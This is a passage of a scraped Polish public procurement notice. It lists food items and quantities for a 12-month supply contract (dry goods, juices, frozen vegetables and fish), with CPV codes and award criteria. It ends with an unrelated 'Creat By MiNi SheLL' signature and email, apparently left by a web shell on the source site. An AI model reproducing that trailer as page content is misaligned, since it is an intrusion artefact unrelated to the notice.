Pieczywo chrupkie typu Wasa żytnie op.210g opakowanie około 24 kromek op 1 000 72 Pieczywo ryżowe 100g szt 50 73 Proszek do pieczenia 18g szt. 1 000 74 Rodzynki op.1kg kg. 50 75 Ryż paraboliczny op 5kg kg 500 76 Ryż biały paraboliczny op 1 kg kg. 100 77 Sól drobnoziarnista jodowana kg. 1 500 78 Sok smaki marchwiowo-owocowy bez cukru 0,9 L szt. 4 000 79 soki 0,33l /op bez konserwantów szt 1 000 80 Sok pomidorowy opak./bez konserwantów l 50 81 Syrop pitny wysokosłodzony 420ml głóg, aronia czarna porzeczka, wiśnia. Malina bez konserwantów szt. 500 82 Suchary bezcukrowe 285g szt. 100 83 Soda spożywcza 100g szt. 500 84 Słodycze bożonarodzeniowe (mikołaje 100g) szt 250 85 Ziarno kukurydzy (popcorn) kg. 200 86 Zioła prawensalskie kg 2, 87 Zioło angielskie kg 2, 88 Zioła Estragon kg 3...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin zapłaty - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mrożonki owocowo-warzywne oraz rybne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Brokuły kg. 300 2 Fasolka szparagowa mroż kg. 130 3 Groszek zielony mrożony kg. 200 4 Kalafior mrożony kg. 200 5 Kukurydza mrożona kg. 170 6 Mieszanka komp.4 składniki kg. 3000 7 Papryka mrożona cięta kg. 100 8 Szpinak kg. 130, 9 Filet mrożony / mintaj / bez glazury/szaterpak kg. 700, 10 Morszczuk b/glazury/szaterpak kg.250, 11 Filet mrożony / dorsz bez glazury/szaterpak kg. 200, 12 Ryba wędzona / makrela kg. 400, 13Truskawka mroż kg. 500 14 Wiśnia bez pestek mroż. kg. 500...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.33.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin zapłaty - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com